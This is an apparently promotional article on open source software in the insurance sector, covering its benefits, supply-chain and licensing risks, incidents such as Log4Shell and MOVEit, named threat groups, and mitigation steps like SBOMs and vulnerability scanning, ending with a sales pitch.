Benefits, Risks, and Real-World Attacks Involving Open Source in the Insurance Industry

The insurance sector is undergoing a rapid digital transformation, integrating technologies like artificial intelligence, big data analytics, blockchain, and cloud computing to better serve customers, optimise operations, and reduce fraud. Central to this shift is the growing reliance on open source software (OSS), tools, libraries, and platforms freely available for development, adaptation, and integration. From talking to c-suite members within all of the key sectors, OSS is recognised as beneficial but also seen as the “elephant in the room” as the risks are known but lack of experience in dealing with this layer is allowing threat penetration to be successful

While OSS empowers insurers with flexibility, innovation, and cost efficiency, it also introduces serious cybersecurity risks. This article explores how open source is being used in insurance, outlining  the real-world consequences of cyber threats involving OSS, and assesses the risks of future attacks, especially as threats grow more sophisticated.

Why Insurers Use Open Source Software

Open source components are now integrated into nearly every stage of the software development lifecycle in the insurance industry. Key benefits include:

• Cost savings: Avoiding high licensing fees of proprietary software.
• Faster development: Leveraging pre-built libraries and frameworks.
• Community support: Tapping into vast global expertise and frequent updates.
• Flexibility: Extending existing open source code to meet business-specific requirements.

Examples include:

• Apache Kafka and Airflow for real-time data processing.
• TensorFlow for machine learning in fraud detection.
• PostgreSQL and MongoDB for scalable data storage.
• OpenJDK as a base for Java-based enterprise applications.

With open source software, legacy systems have been replaced.  Insurance software providers have gained ready-to-use features and deliver enterprise-grade and SaaS applications 50-60% faster, while avoiding vendor lock-in.  They are seizing the opportunity to be part of a sector-specific open source software community to learn, grow, and contribute, with potential to shape the future direction at a sector level.  Some of these ready-to-use features include policy, claim, and property management, as well as time tracking.  There are also templates available to  offer embedded insurance products seamlessly integrated into customer buying experiences.

The business-led software-driven transformation helps streamline processes, enhance risk assessment, and improve customer service.  We can all appreciate the availability of cloud-based solutions that’s increased the ease of purchasing standalone and embedded insurance products in our daily digital experiences.  Forgot to buy travel insurance when you booked your ski holiday?  Not to worry, because the ski rental agency that’s selling ski lift passes on their mobile web app also lets you buy insurance when you checkout.  Open source software is helping to drive innovation and specialized offers across sectors, benefitting sellers and resellers from greater access to customers wherever they are in their journey.

OSS Cybersecurity Risks of Open Source within the Insurance Sector

Open source code, while powerful, is not immune to vulnerabilities. Many packages are maintained by volunteers, and while updates and patches are released very quickly, it’s difficult for a company to keep the pace, because of lack of  awareness and processes to handle them. A single unpatched library can serve as a gateway to an entire corporate network,  and for insurance companies, this can expose sensitive personal, financial, and medical data.

Key risks include:

• Direct cyber attacks Because of the lack of vulnerability scanning, simply by leveraging an existing vulnerability in one opensource component used on an internet facing system, a hacker could get access to all internal databases.
• Supply chain attacks A piece of malicious code included in a widely used software library is then automatically incorporated into thousands of downstream applications that use the library, allowing the attackers to compromise a vast number of targets simultaneously.
• License mismanagement and IP risks When using a non-business friendly licensed component, there’s a significant risk of being forced to publicly release your own intellectual property, leading to loss of competitive advantage and potential legal action.
• Shadow IT and undocumented OSS use The unmonitored use of unapproved software, often by developers seeking speed and agility, creates significant security and compliance blind spots, as these tools operate outside of corporate governance and lack security patching or vulnerability tracking

Notable Cyber Attacks Involving Open Source

1. Log4Shell (CVE-2021-44228) – Apache Log4j

In late 2021, a critical remote code execution vulnerability was discovered in Log4j, a widely used Java logging library.

Impact on insurance: Many insurance firms used Java-based enterprise systems that included Log4j, making them vulnerable.

Exploitation: Threat actors could remotely execute arbitrary code on affected systems. APT groups including Charming Kitten (Iran) and APT41 (China) were linked to active exploitation.

2. SolarWinds Supply Chain Attack

Though not directly OSS-related, this 2020 attack brought attention to third-party code risks, including OSS components.

Relevance to insurers: Many insurers use SolarWinds or similar IT management tools, and the incident led to an industry-wide audit of third-party dependencies.

3. MOVEit Transfer Exploits (2023)

Cl0p ransomware gang exploited zero-day vulnerabilities in MOVEit file transfer software, affecting dozens of insurance, healthcare, and finance companies.

Relation to OSS: MOVEit, while proprietary, included OSS components and APIs, showing how OSS can be an indirect vector.

Victims: Included Genworth Financial, a major life and mortgage insurer.

Known Named Threat Actors Targeting the Sector

• DarkSide / BlackCat: Ransomware-as-a-Service groups frequently use software vulnerabilities, including in OSS, for initial access.
• FIN11 / Cl0p: A ransomware group known for targeting insurance and financial companies.
• APT38 (North Korea): Known for financial theft operations, including targeting SWIFT and related financial systems.
• Lazarus Group: Has targeted healthcare and insurance sectors, possibly for both espionage and financial gain.

Future Threat Landscape: What’s Ahead?

The future risk to insurers from open source-based attacks is growing due to:

• AI-driven vulnerability discovery tools used by threat actors.
• Complex OSS supply chains making traceability and patching harder.
• Open source CI/CD toolchains being exploited (e.g., Jenkins, GitLab CI).

Emerging Concerns:

• Malicious open source packages: Attackers upload poisoned libraries to repositories like npm or PyPI. Example: “ctx” and “phpass” malicious packages.
• Dependency confusion attacks: Exploiting package naming inconsistencies in private/public repositories.
• Insider threats: Poor OSS governance can lead to accidental introduction of vulnerable or backdoored code.

Mitigation Strategies for Insurers

1. Adopt SBOMs (Software Bill of Materials) Maintain a comprehensive inventory of all open source components in use.
2. Automated Vulnerability Scanning Use tools like Meterian, WhiteSource, or Dependabot to detect issues early.
3. Continuous Monitoring & Patching Establish DevSecOps pipelines to enforce regular OSS updates.
4. Zero Trust Architectures Prevent lateral movement even if a component is compromised.
5. Training & Awareness Developers should be trained on secure OSS usage and license compliance.

Conclusion

The open source revolution has undeniably propelled innovation in the insurance industry. But this double-edged sword demands a proactive cybersecurity posture. From high-profile exploits like Log4Shell to the growing sophistication of supply chain attacks, it’s clear that OSS security is no longer optional, it’s critical.

Insurers must recognize open source as both an opportunity and a threat. Only through comprehensive risk management, visibility, and cultural change can they unlock its benefits while shielding themselves from cyber catastrophe.

If you’re in insurance, now’s the time to put OSS security on the boardroom agenda.

Get in touch here to see how we can help!